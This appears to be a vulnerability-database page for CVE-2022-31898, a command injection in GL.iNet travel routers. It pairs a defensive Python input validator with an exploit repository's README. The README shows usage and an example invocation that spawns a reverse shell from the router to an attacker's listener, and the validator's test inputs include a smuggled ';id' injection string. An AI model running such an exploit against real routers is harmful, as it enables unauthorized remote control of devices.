CVE-2022-31898 PoC — GL.iNet GL-MT300N-V2 Mango OS Command Injection Vulnerability

Source
Associated Vulnerability
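Title: GL.iNet GL-MT300N-V2 Mango OS Command Injection Vulnerability (CVE-2022-31898)
Description: GL.iNet GL-MT300N-V2 Mango is a stylish mini travel WiFi router from the Chinese company GL.iNet. GL.iNet GL-MT300N-V2 Mango v3.212 and gl-AX1800 Flint v3.214 contain a security vulnerability: multiple command injection vulnerabilities were found via the ping_addr and trace_addr function parameters.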
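The description above attributes the flaw to the `ping_addr` and `trace_addr` parameters. As an added example (not code from this repository or from the GL.iNet firmware), the following is a server-side allow-list check for such a diagnostic-target field that also keeps the value out of any shell. The function names `validate_diag_target` and `build_ping_argv` and the sample inputs are hypothetical.

```python
import ipaddress
import re

# Allow-list of characters that can appear in an IP literal or hostname.
# Everything else (spaces, quotes, ; | & $ ` ( ) % newlines) is refused up front.
_ALLOWED = re.compile(r"[A-Za-z0-9.:-]{1,253}")
# RFC 1123 hostname label: no leading or trailing hyphen, at most 63 characters.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_diag_target(value):
    """Return a normalised IP address or hostname, or raise ValueError.

    Hypothetical check for a ping_addr / trace_addr style request field.
    """
    # fullmatch (not match) so a trailing newline or suffix cannot slip through.
    if not isinstance(value, str) or not _ALLOWED.fullmatch(value):
        raise ValueError("target contains characters outside the allow-list")
    try:
        return str(ipaddress.ip_address(value))  # IPv4 or IPv6 literal
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if all(_LABEL.fullmatch(label) for label in labels):
        return ".".join(labels).lower()
    raise ValueError("target is not an IP address or hostname")


def build_ping_argv(value, count=4):
    """Build an argument vector for ping; never a shell command string."""
    target = validate_diag_target(value)
    # "--" ends option parsing, so the target can never be read as a flag.
    return ["ping", "-c", str(count), "--", target]


if __name__ == "__main__":
    # Constructed sample inputs, not taken from the PoC or from device traffic.
    for sample in ["192.168.8.1", "Example.COM.", "192.168.8.1;id", "-c"]:
        try:
            print(repr(sample), "->", build_ping_argv(sample))
        except ValueError as err:
            print(repr(sample), "-> rejected:", err)
```

The returned list is meant for an exec-style call such as `subprocess.run(argv)` without `shell=True`, so the validated value is passed as a single argument even if the allow-list were later loosened.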
Readme
# cve-2022-31898
Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215

# Usage

```
./cve-2022-31898.py -h
usage: cve-2022-31898.py [-h] -R RHOST [-P RPORT] -L LHOST [-l LPORT] [-p PWD] [-t]

options:
  -h, --help            show this help message and exit
  -R RHOST, --rhost RHOST
                        IP/hostname of Mango router
  -P RPORT, --rport RPORT
                        Port to connect to Mango router on
  -L LHOST, --lhost LHOST
                        Local host/IP for reverse shell to connect back to
  -l LPORT, --lport LPORT
                        Local port for reverse shell to connect back on
  -p PWD, --pwd PWD     Password to use to log in
  -t, --https           If set, use HTTPS
```

## Example

Exploit GL-iNet router at `192.168.8.1` over HTTPS and connect back to local box at
`192.168.8.123:8008` with admin password `password`:

```
./cve-2022-31898.py -R 192.168.8.1 -P 443 -L 192.168.8.123 -l 8008 -p password -t
```
File Snapshot

```
[4.0K] /data/pocs/65ffdf8fae7b4d778d2c1f847f197c75ae53c2a2
├── [2.8K] cve-2022-31898.py
├── [ 34K] LICENSE
└── [1006] README.md

0 directories, 3 files
```